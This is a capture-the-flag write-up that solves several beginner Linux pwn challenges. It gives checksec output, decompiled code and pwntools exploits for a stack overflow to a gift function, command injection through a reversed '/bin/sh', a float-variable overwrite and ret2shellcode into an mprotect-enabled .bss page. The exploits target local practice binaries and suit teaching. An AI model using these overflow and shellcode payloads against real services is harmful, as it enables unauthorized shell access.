Just nc to the service and cat the flag; nothing to say, it's a sign-in challenge.
```
checksec --file=1
[*] '/mnt/hgfs/windowshare/1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
Check the binary's protections with checksec, then analyze it in IDA.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  vuln(argc, argv, envp);
  return 0;
}
```
There is a vuln function; follow it.
```c
ssize_t vuln()
{
  char buf[16]; // [rsp+0h] [rbp-10h] BYREF

  return read(0, buf, 0x64uLL);
}
```
The vulnerable function is the read call: it reads up to 0x64 bytes into a 16-byte buffer, and buf sits 0x10 bytes below rbp.
In the function list on the left there is a gift function; following it gives us the starting address of /bin/sh.
The exploit is as follows:
```python
from pwn import *

p = process('./pwn1')
gift = 0x4006b6
# 0x10 bytes of buffer plus 0x8 bytes of saved rbp, then the return address
payload = b'a' * (0x10 + 0x8) + p64(gift)
p.sendline(payload)
p.interactive()
```
Same as the first challenge: nc in and look for the flag directly. Simple.
Run checksec as usual.
```
[*] '/mnt/hgfs/windowshare/re'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
```
Both NX (non-executable stack) and PIE (address space layout randomization) are enabled.
Full firepower, one might say.
Open the file in IDA.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("evcexe ot tnaw uoy tahw em lleT:");
  gets(a);
  fun(a);
  system(a);
  return 0;
}
```
There is a fun function; follow it.
```c
__int64 __fastcall fun(const char *a1)
{
  __int64 result; // rax
  char v2; // [rsp+17h] [rbp-9h]
  int i; // [rsp+18h] [rbp-8h]
  int v4; // [rsp+1Ch] [rbp-4h]

  v4 = strlen(a1);
  for ( i = 0; ; ++i )
  {
    result = (unsigned int)(v4 / 2);
    if ( i >= (int)result )
      break;
    v2 = a1[i];
    a1[i] = a1[v4 - i - 1];
    a1[v4 - i - 1] = v2;
  }
  return result;
}
```
Looking at the loop around the if statement, we can see it swaps the characters of our input pairwise from both ends, i.e. the reversed output the challenge prompt hints at.
fun hands the reversed string back to main, which then runs it through system; since system is right there, all we need is /bin/sh to get a shell.
Exploit:
```python
from pwn import *

p = process('./pwn1')
# fun() reverses the input in place before system() runs it, so send "/bin/sh" backwards
payload = b'hs/nib/'
p.sendline(payload)
p.interactive()
```
Simple and fun.
Run checksec.
```
[*] '/mnt/hgfs/windowshare/[CISCN 2019华北]PWN1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
NX is enabled.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  func();
  return 0;
}
```
There is a func function; follow it.
```c
int func()
{
  char v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    return system("cat /flag");
  else
    return puts("Its value should be 11.28125");
}
```
Reading the code, we can see that gets has no length limit, so we need to overflow v1 and overwrite the neighbouring variable so that v2 == 11.28125.
But we cannot simply type 11.28125; it has to be supplied as the hexadecimal form of its IEEE-754 single-precision encoding.
Looking at the assembly in IDA, the address 0x4007F4 holds the hex encoding of 11.28125,
which is 0x41348000.
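To see where 0x41348000 comes from, here is an added example (not part of the writeup) that builds the IEEE-754 single-precision bit pattern of a float by hand, decodes it back, and cross-checks the result against struct. It assumes only normal, finite, non-zero values, which is all this challenge needs.

```python
import struct


def float32_to_bits(x: float) -> int:
    """Encode a normal float as an IEEE-754 single-precision bit pattern.

    Built by hand (sign | biased exponent | 23-bit fraction) so the layout is
    visible. Assumption: zero, subnormals, inf and NaN are out of scope.
    """
    if x == 0.0 or x != x or x in (float("inf"), float("-inf")):
        raise ValueError("only normal, finite, non-zero values are handled")
    sign = 1 if x < 0 else 0
    x = abs(x)
    exp = 0
    while x >= 2.0:          # normalise to 1.f * 2**exp
        x /= 2.0
        exp += 1
    while x < 1.0:
        x *= 2.0
        exp -= 1
    if not -126 <= exp <= 127:
        raise ValueError("exponent out of single-precision range")
    fraction = round((x - 1.0) * (1 << 23))   # the 23 fraction bits
    return (sign << 31) | ((exp + 127) << 23) | fraction


def bits_to_float32(bits: int) -> float:
    """Inverse of float32_to_bits for normal values."""
    sign = (bits >> 31) & 1
    exp = ((bits >> 23) & 0xFF) - 127
    fraction = bits & 0x7FFFFF
    value = (1.0 + fraction / (1 << 23)) * 2.0 ** exp
    return -value if sign else value


def float32_le_bytes(x: float) -> bytes:
    """The 4 bytes as they sit in memory on amd64 (little-endian)."""
    return float32_to_bits(x).to_bytes(4, "little")


def check_against_struct(x: float) -> bool:
    """Cross-check the hand encoding against the C library's float layout."""
    return struct.pack("<f", x) == float32_le_bytes(x)


if __name__ == "__main__":
    bits = float32_to_bits(11.28125)
    print(hex(bits), float32_le_bytes(11.28125), bits_to_float32(bits))
```

Running it prints `0x41348000 b'\x00\x80\x34\x41' 11.28125`, matching the constant IDA shows at 0x4007F4.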
Exploit:
```python
from pwn import *

p = process('./pwn1')
# v1 starts at rbp-0x30 and v2 sits at rbp-0x4, so 0x2c bytes of padding reach v2
payload = b'a' * (0x30 - 0x4) + p64(0x41348000)
p.sendline(payload)
p.interactive()
```
Run checksec.
```
[*] '/mnt/hgfs/windowshare/shellcode'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
We can see NX is enabled.
There is no PIE, so no dynamic debugging with gdb is needed.
Open the file in IDA.
```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[256]; // [rsp+0h] [rbp-100h] BYREF

  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(stdout, 0LL);
  mprotect((void *)((unsigned __int64)&stdout & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);
  memset(s, 0, sizeof(s));
  read(0, s, 0x110uLL);
  strcpy(buff, s);
  return 0;
}
```
With NX enabled it looks as if ret2shellcode is off the table.
But notice the mprotect call (look it up yourself): it marks the page containing stdout, which is in the data segment, as readable, writable and executable.
buf_addr = 0x4040A0 // note this address is in the .bss section; ret2shellcode here means placing our prepared shellcode in .bss
There is an overflow in read (0x110 bytes into a 256-byte buffer) and no backdoor function.
The ret2shellcode conditions are met.
Go straight for it!
Exploit // the architecture must be set because the ELF is 64-bit; without it the process hits EOF
```python
from pwn import *

context.log_level = "DEBUG"
context.arch = 'amd64'  # must match the 64-bit ELF, or shellcraft emits the wrong code and the process hits EOF
p = process('./shellcode')
sh = asm(shellcraft.sh())
# shellcode first, padded to 0x108 (0x100 buffer + 8 bytes saved rbp), then the return address into buff in .bss
payload_1 = sh.ljust(0x108, b'a') + p64(0x4040A0)
p.sendline(payload_1)
p.interactive()
```
Got a shell.